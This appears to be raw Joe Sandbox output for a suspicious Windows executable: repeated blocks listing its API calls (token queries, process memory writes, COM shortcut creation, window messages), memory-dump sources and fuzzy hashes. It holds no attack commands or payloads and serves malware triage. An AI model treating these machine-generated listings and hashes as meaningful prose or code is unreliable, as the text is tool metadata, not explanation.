                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 2664167353-0
                                                                  • Opcode ID: f9bfd55991c42f48f4c5126fc9acd9681f68bcc49a1b9c34c41b3aee377aeedb
                                                                  • Instruction ID: 0ddf844df308ea2c24683506cdaf7d658b82adcb7973297948aa316d7cd4b67d
                                                                  • Opcode Fuzzy Hash: f9bfd55991c42f48f4c5126fc9acd9681f68bcc49a1b9c34c41b3aee377aeedb
                                                                  • Instruction Fuzzy Hash: B1112B33105706AFEB33AFA4DC42D9B3798EF05770B118429F91C9A142EB79C81187A0
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0038ABD7
                                                                  • GetLastError.KERNEL32(?,0038A69F,?,?,?), ref: 0038ABE1
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0038A69F,?,?,?), ref: 0038ABF0
                                                                  • HeapAlloc.KERNEL32(00000000,?,0038A69F,?,?,?), ref: 0038ABF7
                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0038AC0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: c4371988d8b175f3ab3dfb1f1206e85968d2897e961e8322bdc2a4335054669c
                                                                  • Instruction ID: e3ce6dba93e18cb31285921133ee229434ccc8fd46c6725a4b302de4cb29125d
                                                                  • Opcode Fuzzy Hash: c4371988d8b175f3ab3dfb1f1206e85968d2897e961e8322bdc2a4335054669c
                                                                  • Instruction Fuzzy Hash: 1B01FBB1201204BFEB125FA5EC48D6B7BBDEF89755B11046AF545C2250D671DC40CB61
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397A74
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00397A82
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00397A8A
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00397A94
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 974b394db852a772335630c82b55d6d36b8be194b5218e0a7f576913b5977fe1
                                                                  • Instruction ID: 4a8c6d872f489ac885b8dfefda319483f8723bf288d5a7833e3f8b75ce2473ca
                                                                  • Opcode Fuzzy Hash: 974b394db852a772335630c82b55d6d36b8be194b5218e0a7f576913b5977fe1
                                                                  • Instruction Fuzzy Hash: 9F014832C19629EBCF02AFE4EC48AEDBB78FF08711F050456E502B2290DB309A54C7A5
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32 ref: 00389ADC
                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 00389AF7
                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00389B05
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00389B15
                                                                  • CLSIDFromString.OLE32(?,?), ref: 00389B21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: ee67253062b99edc850bdcfef6174fd9384f170c6852faecf40954c8dba835ee
                                                                  • Instruction ID: e5c32c15fa811b70579374c89820b60a986c98f3109c4950639f31e19ed2340b
                                                                  • Opcode Fuzzy Hash: ee67253062b99edc850bdcfef6174fd9384f170c6852faecf40954c8dba835ee
                                                                  • Instruction Fuzzy Hash: 86018F76601204BFDB135F64EC44BAA7BEDEB44351F184066F905D6210D770DD04ABA0
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0038AA79
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0038AA83
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0038AA92
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0038AA99
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0038AAAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: c5f9c6f3d9735a9c627747054d4510360b739da210ef02e0e94c67bc988011b1
                                                                  • Instruction ID: 8510db0270ca13b6e9483d194969f8027aeb99005dc4c60a5fca0bb12a457ddd
                                                                  • Opcode Fuzzy Hash: c5f9c6f3d9735a9c627747054d4510360b739da210ef02e0e94c67bc988011b1
                                                                  • Instruction Fuzzy Hash: ADF04F752513147FEB126FA4AC89E673BACFF49754F00445AFA41C7190DB649C42CB61
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0038AADA
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0038AAE4
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0038AAF3
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0038AAFA
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0038AB10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: ae58176b7970d5c09bede252135e54bbba1bd2bd836d3488e678855f74361a07
                                                                  • Instruction ID: d2c73cd901cbf40b371d426676369870b0b44dc64427ecca1b2f27aee37d1b40
                                                                  • Opcode Fuzzy Hash: ae58176b7970d5c09bede252135e54bbba1bd2bd836d3488e678855f74361a07
                                                                  • Instruction Fuzzy Hash: 2FF04F752413087FEB131FA4FC88E673B6DFF45754F00406AF942C7190CA609801CB61
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0038EC94
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0038ECAB
                                                                  • MessageBeep.USER32(00000000), ref: 0038ECC3
                                                                  • KillTimer.USER32(?,0000040A), ref: 0038ECDF
                                                                  • EndDialog.USER32(?,00000001), ref: 0038ECF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: c60932427116a59301197c7eac88fd0dc0770152f4b8567159bed42711e006b4
                                                                  • Instruction ID: aaf5f78c11b938e88ff72db23183b4d97cc6301c071bd085374f400e71de05f1
                                                                  • Opcode Fuzzy Hash: c60932427116a59301197c7eac88fd0dc0770152f4b8567159bed42711e006b4
                                                                  • Instruction Fuzzy Hash: 9801A9309407159BEB266F20EE4EB967B7CFF00B05F00059AF543654E0DBF0AA44CB80
                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 0036B0BA
                                                                  • StrokeAndFillPath.GDI32(?,?,003CE680,00000000,?,?,?), ref: 0036B0D6
                                                                  • SelectObject.GDI32(?,00000000), ref: 0036B0E9
                                                                  • DeleteObject.GDI32 ref: 0036B0FC
                                                                  • StrokePath.GDI32(?), ref: 0036B117
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: f4b40603cd533066e89a82d79bb3c46f6b3da3c08093b795937252166e743e56
                                                                  • Instruction ID: 1d8b96a23e1497f405e2c7b60c5f13548a7405df691c3c25003813772b89a4ea
                                                                  • Opcode Fuzzy Hash: f4b40603cd533066e89a82d79bb3c46f6b3da3c08093b795937252166e743e56
                                                                  • Instruction Fuzzy Hash: 6CF01930102204EFCB229F69FC0C7983F68A701366F08C325F565840F4C73289A5CF14
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0039F2DA
                                                                  • CoCreateInstance.OLE32(003DDA7C,00000000,00000001,003DD8EC,?), ref: 0039F2F2
                                                                  • CoUninitialize.OLE32 ref: 0039F555
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                  • String ID: .lnk
                                                                  • API String ID: 948891078-24824748
                                                                  • Opcode ID: c2740aace282148287509512161923435fe9dfeb06e4d5aae4a1b1fd4a3824f0
                                                                  • Instruction ID: bd6fe629df07a571ae5371b008b99180fbd53e5f4339f914e3b95bed22fbc094
                                                                  • Opcode Fuzzy Hash: c2740aace282148287509512161923435fe9dfeb06e4d5aae4a1b1fd4a3824f0
                                                                  • Instruction Fuzzy Hash: C6A12C71104301AFD702EF64C892EABB7ECEF98719F00491DF5559B1A2DB70EA09CB92
                                                                  APIs
                                                                    • Part of subcall function 0035660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003553B1,?,?,003561FF,?,00000000,00000001,00000000), ref: 0035662F
                                                                  • CoInitialize.OLE32(00000000), ref: 0039E85D
                                                                  • CoCreateInstance.OLE32(003DDA7C,00000000,00000001,003DD8EC,?), ref: 0039E876
                                                                  • CoUninitialize.OLE32 ref: 0039E893
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                  • String ID: .lnk
                                                                  • API String ID: 2126378814-24824748
                                                                  • Opcode ID: 21f85ba42fe555ad319762f4df4c8d46a167765455d9c904b0bdec426efc6f46
                                                                  • Instruction ID: 09efc8b842d2e9d225d678bbcaabdedaaddd3fa01bbb9875126731a09dfc50a0
                                                                  • Opcode Fuzzy Hash: 21f85ba42fe555ad319762f4df4c8d46a167765455d9c904b0bdec426efc6f46
                                                                  • Instruction Fuzzy Hash: E9A155356043019FCB12DF14C884E2EBBE5BF88711F158999F99A9B3A1CB31EC49CB81
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 003732ED
                                                                    • Part of subcall function 0037E0D0: __87except.LIBCMT ref: 0037E10B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: 47ff94cd2b5199675c99f1bc4b9994b55212bfbd308a4749bd1368e301d6d6e8
                                                                  • Instruction ID: feaf3bb81b57c522f8fca6eb07a533972e61a0f526c607890be95c1a147394c3
                                                                  • Opcode Fuzzy Hash: 47ff94cd2b5199675c99f1bc4b9994b55212bfbd308a4749bd1368e301d6d6e8
                                                                  • Instruction Fuzzy Hash: 38516A71A0820296DB377714C94237A2BDC9B44710F65CDA8F4DDCA1EADF3C8D94B646
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003EDC50,?,0000000F,0000000C,00000016,003EDC50,?), ref: 00394645
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003946C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                  • String ID: REMOVE$THIS
                                                                  • API String ID: 3797816924-776492005
                                                                  • Opcode ID: 8172f7620e4357c69c4b8edd56d8aea77413e9a750d1aab331f3136521013133
                                                                  • Instruction ID: dca76afa340cd7b3ec3ba9c6d66392f4c83ce5a5354c31fb4c30511b4ce1df2a
                                                                  • Opcode Fuzzy Hash: 8172f7620e4357c69c4b8edd56d8aea77413e9a750d1aab331f3136521013133
                                                                  • Instruction Fuzzy Hash: FA419234A002099FCF06DFA4C881EAEB7B5FF49305F148469E916AF2A2DB34DD46CB50
                                                                  APIs
                                                                    • Part of subcall function 0039430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0038BC08,?,?,00000034,00000800,?,00000034), ref: 00394335
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0038C1D3
                                                                    • Part of subcall function 003942D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0038BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00394300
                                                                    • Part of subcall function 0039422F: GetWindowThreadProcessId.USER32(?,?), ref: 0039425A
                                                                    • Part of subcall function 0039422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0038BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0039426A
                                                                    • Part of subcall function 0039422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0038BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00394280
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0038C240
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0038C28D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: 8c1c0d07f8ef42b0df1b16802f83e395647c8ac298e834a5b7dd8ea58ac737df
                                                                  • Instruction ID: 450c3d78e313777edefbfeb92a8eb14401fe2605da9a2763db8a9659de7498f4
                                                                  • Opcode Fuzzy Hash: 8c1c0d07f8ef42b0df1b16802f83e395647c8ac298e834a5b7dd8ea58ac737df
                                                                  • Instruction Fuzzy Hash: 82411B76900218AEDF12EBA4CD81EEEB778BB09700F004495FA85BB181DA71AE45CB61
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003EDC00,00000000,?,?,?,?), ref: 003BA6D8
                                                                  • GetWindowLongW.USER32 ref: 003BA6F5
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003BA705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 12014be1955e1cd4563088f7a98a556174b2a0c156571b8e155e8e0f4bbcbde0
                                                                  • Instruction ID: 20c5b73f404b85ad35fc7db794990d8e6bdd4f803b9c851e11d4507eae3fa64c
                                                                  • Opcode Fuzzy Hash: 12014be1955e1cd4563088f7a98a556174b2a0c156571b8e155e8e0f4bbcbde0
                                                                  • Instruction Fuzzy Hash: 9131C171205A05AFDB228F78DC41BEA77A9FB49328F254725FA75931E0CB70E8509B50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003A5190
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003A51C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |$D:
                                                                  • API String ID: 1413715105-1519587891
                                                                  • Opcode ID: ad74ad4397051b42c44bd7db807ec0047928e50f700cde96f31ffc86d4c0ac36
                                                                  • Instruction ID: d4610fe6df163b6ca458a649f99d6c6a188c8efd4fc5f7e1e54e2c5df47e9b0e
                                                                  • Opcode Fuzzy Hash: ad74ad4397051b42c44bd7db807ec0047928e50f700cde96f31ffc86d4c0ac36
                                                                  • Instruction Fuzzy Hash: 2A311975810219AFCF12AFA4DC85EEE7FB9FF15704F000055E815AA166EB31A946CBA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003BA15E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003BA172
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 003BA196
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: 1cfb353e961d773840b2f4ea36344eb4a9b8f27f902403bca0f874cb51f54fe0
                                                                  • Instruction ID: f9dc0376a0cb949840f4595029085022f6e4f1153cebf498ea44caca826194c2
                                                                  • Opcode Fuzzy Hash: 1cfb353e961d773840b2f4ea36344eb4a9b8f27f902403bca0f874cb51f54fe0
                                                                  • Instruction Fuzzy Hash: BD219F32510618ABDF128F98CC46FEA3B79EF48714F110214FB556B1D0D6B5AC55CB90
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003BA941
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003BA94F
